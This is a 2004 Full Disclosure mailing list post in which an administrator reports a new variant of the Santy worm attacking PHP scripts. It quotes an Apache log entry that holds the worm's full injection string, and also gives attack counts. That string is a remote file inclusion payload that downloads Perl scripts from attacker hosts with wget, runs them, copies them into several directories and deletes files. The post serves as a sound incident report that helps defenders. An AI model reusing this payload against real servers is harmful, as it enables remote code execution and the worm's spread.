Full Disclosure mailing list archives
New Santy-Worm attacks *all* PHP-skripts
From: "Gary E. Miller" <gem () rellim com>
Date: Sun, 26 Dec 2004 15:50:18 -0800 (PST)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Yo All!
It parses their URLs and overwrites variables with strings like: 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget www.visualcoders.net/spybot.txt;...
Looks like www.visualcoders.net is now parked at Godaddy. So the virus has mutated a bit. Since 2am PST 26 Dec I am seeing a slightly different attack. The attack tries to download from: http://midomain.false.ca. false.ca is no in the .ca zone right now. Here is what one of the new attacks looks like in my apache logs: ev1s-64-246-11-25.ev1servers.net cms.psychologytoday.com - [26/Dec/2004:02:17:12-0800] "GET /nmha/email_prof.php?profid=http://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20sess_189f0f0889555397a4de5485dd611113.*%20sess_189f0f0889555397a4de5485dd611114.*%20sess_189f0f0889555397a4de5485dd611112.*;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/tmp/;cp%20sess_189f0f088! 9555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/spool/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/usr/local/apache/proxy/;cd%20/var/tmp/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/spool/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;p! erl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f08895553 97a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/usr/local/apache/proxy/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;rm%20-rf%20/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/spool/mail/sess_189f0f0889555397a4de5485dd611111*%20/var/mail/sess_189f0f0889555397a4de5485dd611111*%20/usr/local/apache/proxy/sess_189f0f0889555397a4de5485dd611111* HTTP/1.0" 200 37741 "-" "LWP::Simple/5.53" I have seen 2700 attacks in just over 48 hours now. 336 of the new variant in the last 14 hours. RGDS GARY - --------------------------------------------------------------------------- Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701 gem () rellim com Tel:+1(541)382-8588 Fax: +1(541)382-8676 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.3 (GNU/Linux) iD8DBQFBz04+8KZibdeR3qURAgxqAJ0XdDSXmiosy1GbhA6AmqRd/HbVegCeIpW2 l0DYPCOB3zSvtgr6nizHyEM= =HQ2D -----END PGP SIGNATURE-----
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: Re: New Santy-Worm attacks *all* PHP-skripts Paul Laudanski (Dec 26)
- <Possible follow-ups>
- New Santy-Worm attacks *all* PHP-skripts Gary E. Miller (Dec 26)
- New Santy-Worm attacks *all* PHP-skripts Juergen Schmidt (Dec 29)
- Re: New Santy-Worm attacks *all* PHP-skripts Paul Laudanski (Dec 25)
- Re: New Santy-Worm attacks *all* PHP-skripts Paul Laudanski (Dec 27)
- Re: New Santy-Worm attacks *all* PHP-skripts Raistlin (Dec 26)
- Re: Re: New Santy-Worm attacks *all* PHP-skripts Paul Laudanski (Dec 26)
- Re: Re: New Santy-Worm attacks *all* PHP-skripts Steve Wray (Dec 29)
- Re: New Santy-Worm attacks *all* PHP-skripts Paul Laudanski (Dec 25)
- Re: New Santy-Worm attacks *all* PHP-skripts Pekka Savola (Dec 29)
- Re: New Santy-Worm attacks *all* PHP-skripts Juergen Schmidt (Dec 29)